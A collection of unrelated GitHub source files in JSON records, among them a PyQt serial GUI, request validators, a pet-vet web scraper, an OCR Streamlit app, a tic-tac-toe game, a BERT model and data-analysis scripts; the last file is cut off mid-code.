+{"seq_id":"40351319713","text":"import PyQt5\nimport PyQt5.QtGui\nfrom PyQt5.QtGui import QIcon\nimport pyqtgraph\nfrom pyqtgraph import PlotWidget\nfrom PyQt5 import QtWidgets, uic\nimport sys\nimport serial.tools.list_ports\nimport time\nimport serial\nfrom PyQt5.QtSerialPort import QSerialPort, QSerialPortInfo\nfrom PyQt5.QtCore import QIODevice\n\nimport os ,sys \n\nbasedir = os.path.dirname(__file__)\ntry:\n from ctypes import windll # Only exists on Windows.\n myappid = 'mycompany.myproduct.subproduct.version'\n windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\nexcept ImportError:\n pass\n\n\napp = QtWidgets.QApplication([])\nui = uic.loadUi(os.path.join(basedir,'Casper_v2.ui'))\nui.setWindowTitle(\"Casper Test GUI\")\n\n\nserial = QSerialPort()\nserial.setBaudRate(115200)\nportList = []\nports = QSerialPortInfo().availablePorts()\nfor port in ports:\n portList.append(port.portName())\nui.comboBox_3.addItems(portList)\nui.comboBox_4.addItems(portList)\n\n\nui.widget_1.setLabel('bottom', 'Time (S) ')\nui.widget_1.setLabel('left', 'Temp (C)')\n\n\n\npressure = list()\ngtime = list()\ni = 0\n\ndef onRead():\n global i\n if not serial.canReadLine(): return \n rx = serial.readLine()\n rxs = str(rx, 'utf-8').strip()\n gtime.append(i)\n pressure.append(float(rxs))\n i = i+1\n ui.label_162.setText(rxs)\n ui.widget_1.plot(gtime, pressure)\n \n \n \n \n\ndef Open_Button():\n serial.setPortName(ui.comboBox_3.currentText())\n serial.setPortName(ui.comboBox_4.currentText())\n serial.open(QIODevice.ReadWrite)\ndef Close_Button():\n serial.close()\n\n\n\nserial.readyRead.connect(onRead)\nui.pushButton_6.clicked.connect(Open_Button)\nui.pushButton_5.clicked.connect(Close_Button)\nui.pushButton_8.clicked.connect(Open_Button)\nui.pushButton_7.clicked.connect(Close_Button)\n\n\n\n\nui.setWindowIcon(QIcon(os.path.join(basedir,\"Screenshot_20210202-191737_Video_Player.ico\")))\nui.show()\napp.exec()","repo_name":"UMBRA-Electronics/ExoBronco-Avionics","sub_path":"Software/GroundStation/Casper_v2.py","file_name":"Casper_v2.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"41921104320","text":"N = int(input())\nlst = list(map(int, input().split()))\ncost = [0] + lst\n\ndp = [0] * (N+1)\ndp[1] = cost[1]\n\nfor i in range(2, N+1):\n for j in range(0, i+1):\n dp[i] = max(dp[i], cost[i-j]+dp[j])\n\nprint(dp[N])","repo_name":"20SKKUAlgo/BAEKJOON","sub_path":"JooEun/23Feb/0228/p11052.py","file_name":"p11052.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"39683842016","text":"from __future__ import annotations\n\nimport argparse\nfrom typing import Sequence\n\nfrom all_repos import autofix_lib\nfrom all_repos.config import Config\n\n\ndef find_repos(_: Config) -> list[str]:\n raise AssertionError('--repos is required')\n\n\ndef main(argv: Sequence[str] | None = None) -> int:\n parser = argparse.ArgumentParser(\n description='Interactively apply a manual change across repos.',\n usage='%(prog)s [options]',\n )\n autofix_lib.add_fixer_args(parser)\n parser.add_argument(\n '--branch-name', default='all-repos-manual',\n help='override the autofixer branch name (default `%(default)s`).',\n )\n parser.add_argument(\n '--commit-msg', '--commit-message', required=True,\n help='set the autofixer commit message.',\n )\n args = parser.parse_args(argv)\n\n # force interactive\n args.interactive = True\n\n repos, config, commit, autofix_settings = autofix_lib.from_cli(\n args,\n find_repos=find_repos,\n msg=args.commit_msg,\n branch_name=args.branch_name,\n )\n\n autofix_lib.fix(\n repos,\n apply_fix=autofix_lib.shell,\n config=config,\n commit=commit,\n autofix_settings=autofix_settings,\n )\n return 0\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","repo_name":"asottile/all-repos","sub_path":"all_repos/manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":483,"dataset":"github-code","pt":"66"}
+{"seq_id":"10033341225","text":"# файл, позволяющий работать с config.json\r\nimport json\r\n\r\n\r\nclass Config:\r\n def __init__(self):\r\n self.file = \"config.json\"\r\n configFile = open(self.file, \"r\")\r\n self.config = json.load(configFile)\r\n configFile.close()\r\n\r\n def getConfigVar(self, variable):\r\n if variable in self.config.keys():\r\n return self.config[variable]\r\n\r\n def setConfigVar(self, variable, arg):\r\n if variable in self.config.keys():\r\n self.config[variable] = arg\r\n with open(self.file, 'w') as config:\r\n config.write(json.dumps(self.config, separators=(',\\n', ': ')))\r\n","repo_name":"Dan4oby/Modular-ABot","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"4417729569","text":"from typing import Optional\nfrom validation.validate import required_keys_present, values_correct_type\n\n\ndef validate(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals post request\n is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n {\n \"comment\": \"here is a comment\",\n \"patientId\": \"123\",\n \"referralHealthFacilityName\": \"H0000\",\n }\n :return: An error message if request body in invalid in some way. None otherwise.\n \"\"\"\n error_message = None\n\n error_message = required_keys_present(\n request_body,\n [\n \"patientId\",\n \"referralHealthFacilityName\",\n ],\n )\n\n if error_message is not None:\n return error_message\n\n all_fields = [\n \"id\",\n \"dateReferred\",\n \"actionTaken\",\n \"isAssessed\",\n \"isCancelled\",\n \"cancelReason\",\n \"notAttended\",\n \"notAttendReason\",\n \"lastEdited\",\n \"userId\",\n \"comment\",\n \"patientId\",\n \"referralHealthFacilityName\",\n ]\n\n for key in request_body:\n if key not in all_fields:\n return \"The key '\" + key + \"' is not a valid field or is set server-side\"\n\n return error_message\n\n\ndef validate_cancel_put_request(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals/cancel-status-switch/ PUT\n request is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n\n :return: An error message if request body is invalid in some way. None otherwise.\n \"\"\"\n record_keys = [\"isCancelled\", \"cancelReason\"]\n\n for key in request_body:\n if key not in record_keys:\n return f\"{key} is not a valid key in referral request.\"\n else:\n record_keys.remove(key)\n\n if len(record_keys) > 0:\n return f\"There are missing fields for the request body.\"\n\n error = values_correct_type(request_body, [\"isCancelled\"], bool)\n if error:\n return error\n\n error = values_correct_type(request_body, [\"cancelReason\"], str)\n if error:\n return error\n\n\ndef validate_not_attend_put_request(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals/not-attend/ PUT\n request is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n\n :return: An error message if request body is invalid in some way. None otherwise.\n \"\"\"\n record_keys = [\n \"notAttendReason\",\n ]\n\n for key in request_body:\n if key not in record_keys:\n return f\"{key} is not a valid key in referral request.\"\n else:\n record_keys.remove(key)\n\n if len(record_keys) > 0:\n return f\"There are missing fields for the request body.\"\n\n error = values_correct_type(request_body, [\"notAttendReason\"], str)\n if error:\n return error\n","repo_name":"drbfraser/CRADLE-Platform","sub_path":"server/validation/referrals.py","file_name":"referrals.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"}
+{"seq_id":"23698578882","text":"import csv\r\nimport threading\r\nimport time\r\nfrom dataclasses import dataclass, astuple, fields\r\n\r\n\r\nimport requests\r\n\r\nBASE_URL = \"https://www.zooplus.de/tierarzt/results\"\r\n\r\nOUTPUT_CSV_PATH = \"doctors.csv\"\r\n\r\n\r\n@dataclass\r\nclass Doctor:\r\n full_name: str\r\n clinic: str\r\n open_time: str\r\n address: str\r\n rating: int\r\n num_of_reviews: int\r\n\r\n\r\nDOCTORS_FIELDS = [field.name for field in fields(Doctor)]\r\n\r\n\r\ndef parse_one_doctor(doctor) -> Doctor:\r\n return Doctor(\r\n full_name=doctor[\"name\"],\r\n clinic=doctor[\"subtitle\"]\r\n if \"subtitle\" in doctor\r\n else \"sorry, we don't have this information\",\r\n open_time=doctor[\"open_time\"],\r\n address=doctor[\"address\"],\r\n rating=doctor[\"avg_review_score\"],\r\n num_of_reviews=doctor[\"count_reviews\"],\r\n )\r\n\r\n\r\ntoken = requests.get(\r\n \"https://www.zooplus.de/tierarzt/api/v2/token?debug=authReduxMiddleware-tokenIsExpired\"\r\n).json()[\"token\"]\r\nheaders = {\"authorization\": f\"Bearer {token}\"}\r\n\r\n\r\ndef get_doctors(num):\r\n all_doctors = []\r\n attribute_from = 0\r\n attribute_page = 1\r\n\r\n page = requests.get(\r\n \"https://www.zooplus.de/tierarzt/api/v2/results\",\r\n params={\r\n \"animal_99\": True,\r\n \"page\": {attribute_page},\r\n \"from\": {attribute_from},\r\n \"size\": 20,\r\n },\r\n headers=headers,\r\n )\r\n content = page.json()\r\n\r\n attribute_from += 20\r\n all_doctors += [parse_one_doctor(doctor) for doctor in content[\"results\"]]\r\n\r\n with open(OUTPUT_CSV_PATH, \"w\", encoding=\"utf-8\") as file:\r\n writer = csv.writer(file)\r\n writer.writerow(DOCTORS_FIELDS)\r\n writer.writerows([astuple(doctor) for doctor in all_doctors])\r\n\r\n\r\ndef main_threads():\r\n tasks = []\r\n\r\n for num in range(1, 6):\r\n tasks.append(threading.Thread(target=get_doctors, args=(num,)))\r\n tasks[-1].start()\r\n\r\n for task in tasks:\r\n task.join()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n start_time = time.perf_counter()\r\n main_threads()\r\n end_time = time.perf_counter()\r\n print(\"Elapsed:\", end_time - start_time)\r\n","repo_name":"anastasia-martyniuk/scraping_zooplus","sub_path":"parse_with_threads.py","file_name":"parse_with_threads.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"14067372746","text":"import numpy as np\nfrom mapping import mapping_3p3um_80nm as mapping\nfrom functions import mapping_functions as mf\nimport importlib\nfrom tqdm import tqdm\n\n# %%\nmapping = importlib.reload(mapping)\nmf = importlib.reload(mf)\n\nscission_matrix = np.load('/Users/fedor/PycharmProjects/MC_simulation/scission_matrix.npy')\nresist_matrix = np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/resist_matrix.npy')\nchain_lens = np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/chain_lens.npy')\nn_chains = len(chain_lens)\n\nchain_tables = []\nprogress_bar = tqdm(total=n_chains, position=0)\n\nfor n in range(n_chains):\n chain_tables.append(\n np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/chain_tables/chain_table_' +\n str(n) + '.npy'))\n progress_bar.update()\n\nresist_shape = mapping.hist_5nm_shape\n\nmf.process_mapping(scission_matrix, resist_matrix, chain_tables)\nzip_length = 1000\nmf.process_depolymerization(resist_matrix, chain_tables, zip_length)\n\n# %%\nfor ct in chain_tables:\n if len(np.where(ct[:, -1] == 10)[0]) > 0:\n break\n","repo_name":"fedorsidorov/MC_simulation","sub_path":"notebooks/tests/test_depolymerization.py","file_name":"test_depolymerization.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"19790845471","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.urls import path\r\n\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('mnnb', views.mnnb, name='mnnb'),\r\n path('post_mnnb', views.post_mnnb, name='post_mnnb'),\r\n \r\n path('lreg', views.lreg, name='lreg'),\r\n path('post_lreg', views.post_lreg, name='post_lreg'),\r\n \r\n path('svm', views.svm, name='svm'),\r\n path('post_svm', views.post_svm, name='post_svm'),\r\n \r\n path('nltk', views.nltk, name='nltk'),\r\n path('post_nltk', views.post_nltk, name='post_nltk'),\r\n]","repo_name":"Siratigui/django-classifiers","sub_path":"spc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"8166890105","text":"import numpy as np \nfrom matplotlib import pyplot as plt \n\ndef epsilon(n, alpha=0.05):\n\treturn np.sqrt(1/(2*n) * np.log(2/alpha))\n\ndef pn(n, p=0.4):\n\tX = [1 if np.random.rand()
=2:\n axes[0][6-indx].boxplot(diabetes_unaltered[col], flierprops=outliers)\n axes[0][6-indx].set_ylabel(col)\n elif indx <=10 and indx>=6:\n axes[1][10-indx].boxplot(diabetes_unaltered[col], flierprops=outliers)\n axes[1][10-indx].set_ylabel(col)\nfig.suptitle(\"Boxplots for Diabetes Features\")\nfig.tight_layout()\nfig.subplots_adjust(top=0.88)\nplt.savefig(f'plots/Boxplots_features')\nplt.clf()\n\n#Scatter Plot\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\naxes.grid(axis='y', alpha=0.5)\naxes.scatter(diabetes_df[\"tch\"], diabetes_df[\"Target\"], marker=\"1\", color='blue')\naxes.scatter(diabetes_df[\"BP\"], diabetes_df[\"Target\"], marker=\"*\", color='orange')\naxes.scatter(diabetes_df[\"BMI\"], diabetes_df[\"Target\"], marker=\".\", color='green')\naxes.set_title(f'Diabetes comparisons')\naxes.set_ylabel('Diabetes Progression Indicator')\naxes.set_xlabel('Feature Levels')\naxes.legend((\"tch\", \"BP\", \"BMI\"))\nplt.savefig(f'plots/diabetesProgression_to_tch_BP_BMI.png', dpi=300)\nplt.clf()\nplt.close()\n\n#Lasso Regression analysis\n\n#Dummy variable for sex feature\nencoded_sex = pd.get_dummies(diabetes_df['Sex'], drop_first=True)\ndiabetes_df = pd.concat([diabetes_df, encoded_sex], axis=1)\ndiabetes_df.rename(columns = {list(diabetes_df)[11]: \"Encoded Sex\"}, inplace=True)\ndiabetes_df.drop(['Sex'], axis=1, inplace=True)\n\n#Removing outliers based on Z Score\nz = np.abs(stats.zscore(diabetes_df))\ndiabetes_df_o = diabetes_df[(z < 3).all(axis=1)]\nX = diabetes_df_o.loc[:, ['Age', 'BMI', 'BP', 'map', 'tc', 'ldl', 'hdl', 'tch', 'glu', 'Encoded Sex']]\ny = diabetes_df_o['Target']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\nlasso = Lasso()\nlasso.fit(X_train, y_train)\n\nprint(f\"Intercept: {lasso.intercept_}\\n\")\nprint(f\"Coeficients: {lasso.coef_}\\n\")\nprint(f\"Named Coeficients: {pd.DataFrame(lasso.coef_, X.columns)}\")\npd.DataFrame(lasso.coef_, X.columns).to_csv(\"Lasso Coefficients\")\n\npredicted_values = lasso.predict(X_test)\n\nfor (real, predicted) in list(zip(y_test, predicted_values)):\n print(f\"Value: {real:.2f}, pred: {predicted:.2f}, diff: {(real - predicted):.2f}\")\n\nsns.set(palette=\"hls\")\nresiduals = y_test - predicted_values\n\nsns.scatterplot(y_test, predicted_values, marker=\"+\")\nplt.plot([0, 300], [0, 300], '--')\nplt.xlabel('Real Value')\nplt.ylabel('Predicted Value')\nplt.title('Lasso Real Value vs Predicted Values')\nplt.savefig('plots/Lasso_Predicted.png')\nplt.clf()\n\nsns.scatterplot(y_test, residuals, marker=\"s\")\nplt.plot([200, 0], [0, 0], '--')\nplt.xlabel('Real Value')\nplt.ylabel('Residuals')\nplt.title('Lasso Real Value vs Residuals')\nplt.savefig('plots/Lasso_Residuals.png')\nplt.clf()\n\nsns.distplot(residuals, bins=20, kde=False)\nplt.plot([0, 0], [50, 0], '--')\nplt.title('Lasso Residual Distribution')\nplt.savefig('plots/Lasso_Residual_Distn.png')\nplt.clf()\nplt.close()\n\nprint(f\"MAE error(avg abs residual): {metrics.mean_absolute_error(y_test, predicted_values)}\")\nprint(f\"MSE error: {metrics.mean_squared_error(y_test, predicted_values)}\")\nprint(f\"RMSE error: {np.sqrt(metrics.mean_squared_error(y_test, predicted_values))}\")","repo_name":"MarisaAlves/Project_Diabetes","sub_path":"Python_Scripts/Lasso_Regression.py","file_name":"Lasso_Regression.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"12160638878","text":"import torch\nimport torch.nn as nn\nfrom transformers.models.bert.modeling_bert import BertConfig, BertEncoder, BertModel\n\nfrom .model_base.model_embed_base import EmbedLayer\nfrom .model_base.model_mlp import MultiLayerPerceptron\n\n\nclass BidirectionalEncoderRepresentationsfromTransformers(nn.Module):\n \"\"\"\n BERT model\n \"\"\"\n\n def __init__(self, settings):\n \"\"\"\n Initializes BERT Model\n\n Parameters:\n settings(dict): Dictionary containing the settings\n \"\"\"\n\n super().__init__()\n\n # Get settings\n self.embedding_dim = settings[\"bert\"][\"embedding_dim\"]\n self.input_dim = settings[\"bert\"][\"input_dim\"]\n self.label_len_dict = settings[\"label_len_dict\"]\n self.n_layers = settings[\"bert\"][\"n_layers\"]\n self.n_heads = settings[\"bert\"][\"n_heads\"]\n self.dense_layer_dim = settings[\"bert\"][\"dense_layer_dim\"]\n self.non_embed_col = settings[\"non_embedding_columns\"]\n\n # Create embedding layer\n self.embed_layer = EmbedLayer(self.embedding_dim, self.label_len_dict)\n\n # Create input linear layer\n embed_output_dim = self.embed_layer.get_output_dim()\n self.input_lin = nn.Linear(\n embed_output_dim + len(self.non_embed_col), self.input_dim\n )\n\n # Create BERT layer\n self.config = BertConfig(\n 3, # not used\n hidden_size=self.input_dim,\n num_hidden_layers=self.n_layers,\n num_attention_heads=self.n_heads,\n max_position_embeddings=settings[\"bert\"][\"max_seq_len\"],\n )\n\n self.encoder = BertModel(self.config)\n\n # output dense layer\n self.output_lin = MultiLayerPerceptron(self.input_dim, self.dense_layer_dim)\n\n return\n\n def forward(self, x):\n # Get data input size\n input_size = len(x[\"interaction\"])\n\n # Embedding layer\n embedded_x = self.embed_layer(x)\n\n # Combine non-embedding layer\n if len(self.non_embed_col) != 0:\n embedded_x = torch.cat(\n [embedded_x] + [x[i].unsqueeze(2) for i in self.non_embed_col], -1\n )\n\n # Input linear layer\n input_x = self.input_lin(embedded_x)\n\n # BERT layer\n encoded_layers = self.encoder(inputs_embeds=input_x, attention_mask=x[\"mask\"])\n out = encoded_layers[0]\n\n # Dense layer\n out = out.contiguous().view(input_size, -1, self.input_dim)\n out = self.output_lin(out).view(input_size, -1)\n\n return out\n","repo_name":"boostcampaitech5/level2_dkt-recsys-06","sub_path":"code/src/model_folder/model_bert.py","file_name":"model_bert.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"18407870815","text":"#!/usr/bin/python3\n\"\"\"Defines a class Square that inherits from class Rectangle\"\"\"\nRectangle = __import__('9-rectangle').Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"Description for the class Square\"\"\"\n\n def __init__(self, size):\n \"\"\"Initializes instances of the class\"\"\"\n\n super().integer_validator('size', size)\n super().__init__(size, size)\n self.__size = size\n","repo_name":"Beldine-Moturi/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/11-square.py","file_name":"11-square.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"9085939292","text":"import streamlit as st\nfrom PIL import Image, ImageDraw\nimport time\nimport os\nimport requests\nfrom google.cloud import vision\nfrom google.cloud.vision_v1 import types\nfrom google.oauth2 import service_account\nimport json\nimport uuid\nimport io\n\n# import audio\nimport threading\nfrom multiprocessing import Queue\n\nmaikadomain = os.getenv(\"MAIKA_DOMAIN\")\n\n\ncredentials = service_account.Credentials.from_service_account_info(\n dict(st.secrets[\"connection\"][\"gcs\"]), scopes=[\"https://www.googleapis.com/auth/cloud-platform\"]\n)\n\n# def detect_document_text_with_confidence(full_text_annotation, min_confidence=0.9):\n\n# filtered_text_blocks = []\n# for page in full_text_annotation.pages:\n# for block in page.blocks:\n# for paragraph in block.paragraphs:\n# for word in paragraph.words:\n# text = ''.join([symbol.text for symbol in word.symbols])\n# confidence = word.confidence\n# if confidence > min_confidence:\n# filtered_text_blocks.append((text, confidence))\n\n# return filtered_text_blocks\n\n@st.cache_data\ndef get_file_content(image_url):\n response = requests.get(image_url)\n file_content = response.content\n return file_content\n\ndef detect_document_text_with_confidence(full_text_annotation, min_block_conf = 0.0, min_paragraph_conf=0.9, min_word_conf=0.0):\n result=''\n\n for page in full_text_annotation.pages:\n # print(42, page.confidence)\n block_texts = []\n for block in page.blocks:\n if float(block.confidence) < min_block_conf:\n continue\n paragraph_texts = []\n for paragraph in block.paragraphs:\n if float(paragraph.confidence) < min_paragraph_conf: continue\n\n words = []\n # print(48, paragraph.confidence)\n for word in paragraph.words:\n if float(word.confidence) 9:\n raise ValueError(\"User input out of range.\")\n elif board_array[user_input - 1] != Piece.E:\n print(\"Error: This space is not available.\")\n continue\n else:\n position = user_input\n except ValueError:\n print(\"Error: Invalid input.\")\n continue\n\n # Adjust for 0-based index.\n return position - 1\n\ndef user_turn(board_array):\n position = user_choice_prompt(board_array)\n board_array[position] = Piece.X\n\ndef computer_turn(board_array):\n position = random_empty_space_index(board_array)\n board_array[position] = Piece.O\n\ndef get_board_type():\n default = BoardType.NUMBERED\n\n if len(sys.argv) == 2:\n if sys.argv[1] == BoardType.SIMPLE.value:\n return BoardType.SIMPLE\n elif sys.argv[1] == BoardType.NUMBERED.value:\n return BoardType.NUMBERED\n else:\n return default\n else:\n return default\n\n# Main\n\ndef main():\n board_type = get_board_type()\n play_game = True\n while play_game:\n board_array = create_board_array()\n game_is_over = False\n\n print_board(board_type, board_array)\n\n while not game_is_over:\n user_turn(board_array)\n game_is_over = check_for_winner(board_array) or check_for_tie(board_array)\n\n if not game_is_over:\n computer_turn(board_array)\n game_is_over = check_for_winner(board_array) or check_for_tie(board_array)\n\n print_board(board_type, board_array)\n\n if game_is_over:\n check_for_winner(board_array, print_results=True) or check_for_tie(board_array, print_results=True)\n\n print()\n play_again_user_input = input(\"Play again? (Y/n) \")\n if play_again_user_input != \"\" and play_again_user_input != \"Y\" and play_again_user_input != \"y\":\n play_game = False\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print()\n print(\"Bye-bye!\")\n quit()","repo_name":"rlziii/Python-Tic-Tac-Toe","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"40755250111","text":"#!/usr/bin/env python\n\nimport argparse\nimport codecs\nimport configparser\nimport datetime\nimport json\nimport os\nimport shutil\nimport zipfile\n\n\nLEGACY_DISTROS = {\n \"baidu\": \"firefox.baidusd\",\n \"baizhu\": \"firefox.dw\",\n \"cumulon\": \"firefox.newhua\",\n \"kingsoft\": \"firefox.kis\",\n \"mainOther\": \"firefox.com.cn\",\n \"mainWinFull\": \"full.firefox.com.cn\",\n \"mainWinStub\": \"stub.firefox.com.cn\",\n \"mainWinStubFallback\": \"firefox.latest\",\n \"mydown\": \"firefox.yesky\",\n \"others\": \"firefox.others\",\n \"qihoo\": \"firefox.3gj\",\n \"tencent\": \"firefox.qm\",\n \"xbsafe\": \"firefox.xbsafe2\",\n \"zol\": \"firefox.zol\"\n}\n\n\ndef update_dist_extension(distro, extensions):\n for ext_id in extensions:\n filename = \"{}.xpi\".format(ext_id)\n\n ext_path = os.path.join(\"..\", distro, \"distribution\",\n \"extensions\", filename)\n if os.path.exists(ext_path):\n print(\"Updating {}\".format(ext_path))\n shutil.copy2(extensions[ext_id], ext_path)\n continue\n\n opt_ext_path = os.path.join(\"..\", distro, \"distribution\",\n \"optional-extensions\", filename)\n if os.path.exists(opt_ext_path):\n print(\"Updating {}\".format(opt_ext_path))\n shutil.copy2(extensions[ext_id], opt_ext_path)\n\n\ndef update_dist_ini(distro, version):\n legacy_distro = LEGACY_DISTROS.get(distro, \"firefox.com.cn\")\n\n cfg = configparser.ConfigParser()\n cfg.optionxform = str\n cfg.read([\n os.path.join(\"templates\", \"distribution.ini\"),\n os.path.join(\"..\", distro, \"dist_addition.ini\")\n ], \"utf-8\")\n\n cfg[\"Global\"][\"version\"] = version\n cfg[\"Preferences\"][\"app.distributor.channel\"] = json.dumps(distro)\n cfg[\"Preferences\"][\"app.partner.{}\".format(distro)] = json.dumps(distro)\n cfg[\"Preferences\"][\"app.chinaedition.channel\"] = json.dumps(legacy_distro)\n\n dist_ini_path = os.path.join(\"..\", distro,\n \"distribution\", \"distribution.ini\")\n print(\"Updating {}\".format(dist_ini_path))\n with codecs.open(dist_ini_path, \"wb\", \"utf-8\") as dist_ini:\n cfg.write(dist_ini, space_around_delimiters=False)\n\n\ndef update_extension(args):\n extensions = {}\n\n if args.ext:\n exts = args.ext\n else:\n ext_dir = os.path.join(\"templates\", \"extensions\")\n exts = [os.path.join(ext_dir, ext_name)\n for ext_name in os.listdir(ext_dir)\n if ext_name.endswith(\".xpi\")]\n\n for ext in exts:\n with zipfile.ZipFile(ext) as ext_file:\n try:\n manifest_file = ext_file.open(\"manifest.json\")\n except KeyError:\n manifest_file = ext_file.open(\"webextension/manifest.json\")\n manifest = json.loads(manifest_file.read().decode(\"utf-8\"))\n manifest_file.close()\n\n ext_id = manifest.get(\"applications\", {}).get(\"gecko\", {}).get(\"id\")\n if not ext_id:\n print(\"id not found for extension: {}\".format(ext))\n continue\n\n extensions[ext_id] = ext\n\n for distro in os.listdir(\"..\"):\n if not os.path.exists(os.path.join(\"..\", distro, \"repack.cfg\")):\n continue\n\n update_dist_extension(distro, extensions)\n\n\n\ndef update_ini(args):\n for distro in os.listdir(\"..\"):\n if not os.path.exists(os.path.join(\"..\", distro, \"repack.cfg\")):\n continue\n\n update_dist_ini(distro, \"{}.{}\".format(args.year, args.month))\n\n\ndef main():\n today = datetime.date.today()\n\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(\n description='subcommands to update parts of the each distribution',\n help='run each subcommand to see more details')\n\n ini_parser = subparsers.add_parser('ini')\n ini_parser.add_argument(\"-y\", \"--year\", default=today.year, type=int,\n help=\"set year part of distribution version\", metavar=\"YYYY\")\n ini_parser.add_argument(\"-m\", \"--month\", default=today.month, type=int,\n help=\"set month part of distribution version\", metavar=\"MM\")\n ini_parser.set_defaults(func=update_ini)\n\n ext_parser = subparsers.add_parser('extension')\n ext_parser.add_argument(\"-e\", \"--ext\", nargs='+',\n help=\"the extension file(s) to copy into each distribution\",\n metavar=\"ext.xpi\")\n ext_parser.set_defaults(func=update_extension)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mozilla-partners/mozillaonline","sub_path":"desktop/scripts/update-dist.py","file_name":"update-dist.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"74016025490","text":"# number of words, chars, word freq., sentence freq. audio len\n\nimport sys\nimport re\n\npattern = re.compile('[\\W_]+', re.UNICODE)\n\ntext_path = sys.argv[1] #/home/danni/workspace/data/cv/clean_validated/text'\n#'/home/danni/workspace/data/how2/data/orig/how2-300h-v1/data/train/text.id.en'\n\nword_dict = dict()\nsent_dict = dict()\n\nwith open(text_path, 'r') as f:\n for line in f.readlines():\n words = [pattern.sub('', i.strip()) for i in line.strip().lower().split(' ')[1:]]\n for word in words:\n if word not in word_dict:\n word_dict[word] = 1\n else:\n word_dict[word] += 1\n sent = ' '.join(words)\n if sent not in sent_dict:\n sent_dict[sent] = 1\n else:\n sent_dict[sent] += 1\n\nprint('Vocab size:', len(word_dict))\nprint('Vocab count:')\nfor tup in sorted(word_dict.items(), key=lambda kv: kv[1], reverse=True)[:100]:\n print(tup)\n\nprint('Sent size:', len(sent_dict))\nprint('Sent count:')\nfor tup in sorted(sent_dict.items(), key=lambda kv: kv[1], reverse=True)[:100]:\n print(tup)\n","repo_name":"dannigt/NMTGMinor.lowLatency","sub_path":"smalltools/corpus_stats.py","file_name":"corpus_stats.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"}
+{"seq_id":"40033945579","text":"'''\n\n explore.py\n\n Description: This file contains functions used for producing visualizations\n and conducting statistical tests in the final report notebook.\n\n Variables:\n\n None\n\n Functions:\n\n plot_target_distribution(df)\n plot_most_frequent_words(df)\n plot_contains_keywords(df)\n plot_bigrams(df)\n plot_readme_size_vs_language(df, group_column = 'language')\n one_sample_ttest(df, sample, column, alternative = 'two-sided')\n\n'''\n\n################################################################################\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\n\nimport nltk\n\nfrom wordcloud import WordCloud\n\n################################################################################\n\ndef plot_target_distribution(df: pd.DataFrame) -> None:\n '''\n Create a plot of the distribution of the target variable \"language\".\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n plt.figure(figsize = (14, 4))\n sns.histplot(data = df, x = 'language')\n\n plt.title('The main programming language for most repositories is not in the top 3 (Python, C++, JavaScript)')\n plt.xlabel('Programming Language')\n \n plt.show()\n\n################################################################################\n\ndef plot_most_frequent_words(df: pd.DataFrame) -> None:\n '''\n Create plots displaying the most frequent words for each programming \n language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing natural language data. The data should \n ideally be prepared.\n '''\n\n # Show the top 5 most frequent words.\n n 